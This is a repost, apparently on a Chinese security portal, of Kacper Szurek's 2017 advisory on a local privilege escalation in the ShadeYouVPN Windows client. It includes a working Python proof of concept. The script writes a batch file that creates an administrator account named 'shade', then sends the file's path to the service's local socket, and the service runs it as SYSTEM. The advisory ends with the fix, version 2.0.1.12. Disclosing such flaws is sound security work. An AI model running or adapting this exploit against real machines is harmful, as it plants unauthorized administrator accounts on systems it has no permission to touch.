首页
|
安全文章
|
安全工具
|
Exploits
|
本站原创
|
关于我们
|
网站地图
|
安全论坛
当前位置:
主页
>
安全文章
>
文章资料
>
Exploits
>文章内容
ShadeYouVPN Client 2.0.1.11 - Privilege Escalation
来源:https://security.szurek.pl 作者:Szurek 发布时间:2017-02-15
# Exploit ShadeYouVPN.com Client v2.0.1.11 for Windows Privilege Escalation
# Date: 14.02.2017
# Software Link:
https://shadeyouvpn.com/
# Exploit Author: Kacper Szurek
# Contact:
https://twitter.com/KacperSzurek
# Website:
https://security.szurek.pl/
# Category: local
1. Description
`ShadeYou` service executes any file path send through socket without verification as SYSTEM user.
https://security.szurek.pl/shadeyouvpncom-client-v20111-for-windows-privilege-escalation.html
2. Proof of Concept
import socket
import tempfile
print "ShadeYouVPN.com Client v2.0.1.11 for Windows Privilege Escalation"
print "by Kacper Szurek"
print "
https://security.szurek.pl/
"
print "
https://twitter.com/KacperSzurek
"
t = tempfile.TemporaryFile(delete=False, suffix='.bat')
t.write("net user shade /add\n")
t.write("net localgroup administrators shade /add")
t.close()
s = socket.socket()
s.connect(("127.0.0.1", 10295))
s.send("s||config|"+t.name+"|ccccc|ddddd|eeee|ffff|\r\n")
print s.recv(1024)
print s.recv(1024)
3. Solution
Update to version 2.0.1.12
[
推荐
] [
评论(0条)
]
[返回顶部]
[打印本页]
[关闭窗口]
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
§最新评论:
热点文章
·
CVE-2012-0217 Intel sysret exp
·
Linux Kernel 2.6.32 Local Root
·
Array Networks vxAG / xAPV Pri
·
Novell NetIQ Privileged User M
·
Array Networks vAPV / vxAG Cod
·
Excel SLYK Format Parsing Buff
·
PhpInclude.Worm - PHP Scripts
·
Apache 2.2.0 - 2.2.11 Remote e
·
VideoScript 3.0 <= 4.0.1.50 Of
·
Yahoo! Messenger Webcam 8.1 Ac
·
Family Connections <= 1.8.2 Re
·
Joomla Component EasyBook 1.1
相关文章
·
Tor Browser 6.0.5 remote Denia
·
Linux Kernel 3.10.0 (CentOS7)
·
HP Smart Storage Administrator
·
Microsoft Edge - TypedArray.so
·
Apache OpenOffice Text Documen
·
Piwik 2.14.0 / 2.16.0 / 2.17.1
·
Microsoft Office Word Maliciou
·
RandoriSec
·
GNU / Bash v4.4 autocompletion
·
OpenText Documentum D2 - Remot
·
Zoom Player 12.7 / 13 Buffer O
·
TI Online Examination System 2
推荐广告
CopyRight © 2002-2022
VFocuS.Net
All Rights Reserved